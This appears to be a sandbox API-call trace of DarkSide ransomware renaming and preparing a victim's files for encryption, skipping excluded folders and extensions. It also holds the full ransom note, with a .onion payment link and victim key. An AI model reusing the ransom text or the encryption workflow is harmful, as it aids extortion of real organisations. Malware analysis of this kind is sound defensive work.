[0159.270] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.270] wcslen (_String="hta") returned 0x3 [0159.270] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.270] wcslen (_String="msi") returned 0x3 [0159.270] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.270] wcslen (_String="pdb") returned 0x3 [0159.270] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.270] wcslen (_String="sqlite") returned 0x6 [0159.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0159.270] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.270] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0159.270] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0159.270] wcscpy (in: _Dest=0x32400d2, _Source="MSNBC News.url" | out: _Dest="MSNBC News.url") returned="MSNBC News.url" [0159.271] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", dwFileAttributes=0x80) returned 1 [0159.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0159.271] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.271] CloseHandle (hObject=0x1b8) returned 1 [0159.271] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.271] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" [0159.271] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 0x47 [0159.271] wcscpy (in: _Dest=0x32500f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.271] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.c06622a1"), dwFlags=0x8) returned 1 [0159.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0159.277] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.277] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x37e0020 [0159.284] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7fe4be4c [0159.284] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6538a058 [0159.284] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e71115c [0159.284] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78092d01 [0159.284] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4941bf7b [0159.284] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x409f0487 [0159.284] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x79f8729b [0159.284] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b4aeffa [0159.287] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x37e0094, Length=0x80) returned 0xdaf4d67b [0159.287] RtlComputeCrc32 (PartialCrc=0xd67b, Buffer=0x37e0094, Length=0x80) returned 0xd577fa06 [0159.287] RtlComputeCrc32 (PartialCrc=0xfa06, Buffer=0x37e0094, Length=0x80) returned 0x5f788ddb [0159.287] RtlComputeCrc32 (PartialCrc=0x8ddb, Buffer=0x37e0094, Length=0x80) returned 0x74db8802 [0159.288] RtlComputeCrc32 (PartialCrc=0x8802, Buffer=0x37e0094, Length=0x80) returned 0xc4b35b01 [0159.288] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0159.288] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.288] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.288] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c921000, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8c921000, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c921000, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.288] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.288] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.288] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0159.288] _wcsicmp (_Str1="backup", _Str2="MSN Websites") returned -11 [0159.288] wcslen (_String="backup") returned 0x6 [0159.288] _wcsicmp (_Str1="bak", _Str2="MSN Websites") returned -11 [0159.288] wcslen (_String="bak") returned 0x3 [0159.288] _wcsicmp (_Str1="back", _Str2="MSN Websites") returned -11 [0159.288] wcslen (_String="back") returned 0x4 [0159.288] _wcsicmp (_Str1="archive", _Str2="MSN Websites") returned -12 [0159.288] wcslen (_String="archive") returned 0x7 [0159.288] _wcsicmp (_Str1="bckp", _Str2="MSN Websites") returned -11 [0159.288] wcslen (_String="bckp") returned 0x4 [0159.288] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.290] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.291] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c757f80, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8c757f80, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c757f80, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.291] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.291] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0159.291] _wcsicmp (_Str1="$recycle.bin", _Str2="Windows Live") returned -83 [0159.291] wcslen (_String="$recycle.bin") returned 0xc [0159.291] _wcsicmp (_Str1="config.msi", _Str2="Windows Live") returned -20 [0159.291] wcslen (_String="config.msi") returned 0xa [0159.291] _wcsicmp (_Str1="$windows.~bt", _Str2="Windows Live") returned -83 [0159.291] wcslen (_String="$windows.~bt") returned 0xc [0159.291] _wcsicmp (_Str1="$windows.~ws", _Str2="Windows Live") returned -83 [0159.291] wcslen (_String="$windows.~ws") returned 0xc [0159.291] _wcsicmp (_Str1="windows", _Str2="Windows Live") returned -32 [0159.291] wcslen (_String="windows") returned 0x7 [0159.291] _wcsicmp (_Str1="appdata", _Str2="Windows Live") returned -22 [0159.291] wcslen (_String="appdata") returned 0x7 [0159.291] _wcsicmp (_Str1="application data", _Str2="Windows Live") returned -22 [0159.291] wcslen (_String="application data") returned 0x10 [0159.291] _wcsicmp (_Str1="boot", _Str2="Windows Live") returned -21 [0159.291] wcslen (_String="boot") returned 0x4 [0159.291] _wcsicmp (_Str1="google", _Str2="Windows Live") returned -16 [0159.291] wcslen (_String="google") returned 0x6 [0159.291] _wcsicmp (_Str1="mozilla", _Str2="Windows Live") returned -10 [0159.291] wcslen (_String="mozilla") returned 0x7 [0159.291] _wcsicmp (_Str1="program files", _Str2="Windows Live") returned -7 [0159.291] wcslen (_String="program files") returned 0xd [0159.291] _wcsicmp (_Str1="program files (x86)", _Str2="Windows Live") returned -7 [0159.291] wcslen (_String="program files (x86)") returned 0x13 [0159.291] _wcsicmp (_Str1="programdata", _Str2="Windows Live") returned -7 [0159.292] wcslen (_String="programdata") returned 0xb [0159.292] _wcsicmp (_Str1="system volume information", _Str2="Windows Live") returned -4 [0159.292] wcslen (_String="system volume information") returned 0x19 [0159.292] _wcsicmp (_Str1="tor browser", _Str2="Windows Live") returned -3 [0159.292] wcslen (_String="tor browser") returned 0xb [0159.292] _wcsicmp (_Str1="windows.old", _Str2="Windows Live") returned 14 [0159.292] wcslen (_String="windows.old") returned 0xb [0159.292] _wcsicmp (_Str1="intel", _Str2="Windows Live") returned -14 [0159.292] wcslen (_String="intel") returned 0x5 [0159.292] _wcsicmp (_Str1="msocache", _Str2="Windows Live") returned -10 [0159.292] wcslen (_String="msocache") returned 0x8 [0159.292] _wcsicmp (_Str1="perflogs", _Str2="Windows Live") returned -7 [0159.292] wcslen (_String="perflogs") returned 0x8 [0159.292] _wcsicmp (_Str1="x64dbg", _Str2="Windows Live") returned 1 [0159.292] wcslen (_String="x64dbg") returned 0x6 [0159.292] _wcsicmp (_Str1="public", _Str2="Windows Live") returned -7 [0159.292] wcslen (_String="public") returned 0x6 [0159.292] _wcsicmp (_Str1="all users", _Str2="Windows Live") returned -22 [0159.292] wcslen (_String="all users") returned 0x9 [0159.292] _wcsicmp (_Str1="default", _Str2="Windows Live") returned -19 [0159.292] wcslen (_String="default") returned 0x7 [0159.292] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0159.292] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 0x2d [0159.292] wcscpy (in: _Dest=0x208e78, _Source="Windows Live" | out: _Dest="Windows Live") returned="Windows Live" [0159.292] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.292] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.293] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0159.293] GetNamedSecurityInfoW () returned 0x0 [0159.293] SetEntriesInAclW () returned 0x0 [0159.293] SetNamedSecurityInfoW () returned 0x0 [0159.296] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b5c8) returned 1 [0159.296] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.296] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 1 [0159.297] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.297] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0159.297] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0159.298] CloseHandle (hObject=0x1a4) returned 1 [0159.298] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.298] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0159.299] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="" [0159.299] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 0x39 [0159.299] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0159.299] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8ca51b00, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8ca51b00, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.299] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0159.299] _wcsicmp (_Str1="Get Windows Live.url", _Str2="README.c06622a1.TXT") returned -11 [0159.299] wcsstr (_Str="Get Windows Live.url", _SubStr="README") returned 0x0 [0159.299] _wcsicmp (_Str1="autorun.inf", _Str2="Get Windows Live.url") returned -6 [0159.299] wcslen (_String="autorun.inf") returned 0xb [0159.299] _wcsicmp (_Str1="boot.ini", _Str2="Get Windows Live.url") returned -5 [0159.299] wcslen (_String="boot.ini") returned 0x8 [0159.299] _wcsicmp (_Str1="bootfont.bin", _Str2="Get Windows Live.url") returned -5 [0159.299] wcslen (_String="bootfont.bin") returned 0xc [0159.299] _wcsicmp (_Str1="bootsect.bak", _Str2="Get Windows Live.url") returned -5 [0159.299] wcslen (_String="bootsect.bak") returned 0xc [0159.299] _wcsicmp (_Str1="desktop.ini", _Str2="Get Windows Live.url") returned -3 [0159.299] wcslen (_String="desktop.ini") returned 0xb [0159.300] _wcsicmp (_Str1="iconcache.db", _Str2="Get Windows Live.url") returned 2 [0159.300] wcslen (_String="iconcache.db") returned 0xc [0159.300] _wcsicmp (_Str1="ntldr", _Str2="Get Windows Live.url") returned 7 [0159.300] wcslen (_String="ntldr") returned 0x5 [0159.300] _wcsicmp (_Str1="ntuser.dat", _Str2="Get Windows Live.url") returned 7 [0159.300] wcslen (_String="ntuser.dat") returned 0xa [0159.300] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Get Windows Live.url") returned 7 [0159.300] wcslen (_String="ntuser.dat.log") returned 0xe [0159.300] _wcsicmp (_Str1="ntuser.ini", _Str2="Get Windows Live.url") returned 7 [0159.300] wcslen (_String="ntuser.ini") returned 0xa [0159.300] _wcsicmp (_Str1="thumbs.db", _Str2="Get Windows Live.url") returned 13 [0159.300] wcslen (_String="thumbs.db") returned 0x9 [0159.300] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.300] wcslen (_String="386") returned 0x3 [0159.300] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.300] wcslen (_String="adv") returned 0x3 [0159.300] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.300] wcslen (_String="ani") returned 0x3 [0159.300] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.300] wcslen (_String="bat") returned 0x3 [0159.300] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.300] wcslen (_String="bin") returned 0x3 [0159.300] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.300] wcslen (_String="cab") returned 0x3 [0159.300] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.300] wcslen (_String="cmd") returned 0x3 [0159.300] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.300] wcslen (_String="com") returned 0x3 [0159.300] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.300] wcslen (_String="cpl") returned 0x3 [0159.300] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.300] wcslen (_String="cur") returned 0x3 [0159.300] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.300] wcslen (_String="deskthemepack") returned 0xd [0159.300] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.301] wcslen (_String="diagcab") returned 0x7 [0159.301] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.301] wcslen (_String="diagcfg") returned 0x7 [0159.301] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.301] wcslen (_String="diagpkg") returned 0x7 [0159.301] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.301] wcslen (_String="dll") returned 0x3 [0159.301] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.301] wcslen (_String="drv") returned 0x3 [0159.301] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.301] wcslen (_String="exe") returned 0x3 [0159.301] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.301] wcslen (_String="hlp") returned 0x3 [0159.301] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.301] wcslen (_String="icl") returned 0x3 [0159.301] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.301] wcslen (_String="icns") returned 0x4 [0159.301] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.301] wcslen (_String="ico") returned 0x3 [0159.301] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.301] wcslen (_String="ics") returned 0x3 [0159.301] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.301] wcslen (_String="idx") returned 0x3 [0159.301] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.301] wcslen (_String="ldf") returned 0x3 [0159.301] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.301] wcslen (_String="lnk") returned 0x3 [0159.301] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.301] wcslen (_String="mod") returned 0x3 [0159.301] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.301] wcslen (_String="mpa") returned 0x3 [0159.301] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.301] wcslen (_String="msc") returned 0x3 [0159.301] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.301] wcslen (_String="msp") returned 0x3 [0159.301] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.302] wcslen (_String="msstyles") returned 0x8 [0159.302] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.302] wcslen (_String="msu") returned 0x3 [0159.302] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.302] wcslen (_String="nls") returned 0x3 [0159.302] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.302] wcslen (_String="nomedia") returned 0x7 [0159.302] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.302] wcslen (_String="ocx") returned 0x3 [0159.302] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.302] wcslen (_String="prf") returned 0x3 [0159.302] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.302] wcslen (_String="ps1") returned 0x3 [0159.302] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.302] wcslen (_String="rom") returned 0x3 [0159.302] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.302] wcslen (_String="rtp") returned 0x3 [0159.302] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.302] wcslen (_String="scr") returned 0x3 [0159.302] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.302] wcslen (_String="shs") returned 0x3 [0159.302] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.302] wcslen (_String="spl") returned 0x3 [0159.302] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.302] wcslen (_String="sys") returned 0x3 [0159.302] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.302] wcslen (_String="theme") returned 0x5 [0159.302] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.302] wcslen (_String="themepack") returned 0x9 [0159.302] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.302] wcslen (_String="wpx") returned 0x3 [0159.302] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.302] wcslen (_String="lock") returned 0x4 [0159.302] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.302] wcslen (_String="key") returned 0x3 [0159.302] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.302] wcslen (_String="hta") returned 0x3 [0159.302] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.303] wcslen (_String="msi") returned 0x3 [0159.303] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.303] wcslen (_String="pdb") returned 0x3 [0159.303] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.303] wcslen (_String="sqlite") returned 0x6 [0159.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0159.303] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.303] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0159.303] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 0x38 [0159.303] wcscpy (in: _Dest=0x32400d2, _Source="Get Windows Live.url" | out: _Dest="Get Windows Live.url") returned="Get Windows Live.url" [0159.303] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", dwFileAttributes=0x80) returned 1 [0159.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0159.303] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.303] CloseHandle (hObject=0x1f4) returned 1 [0159.303] 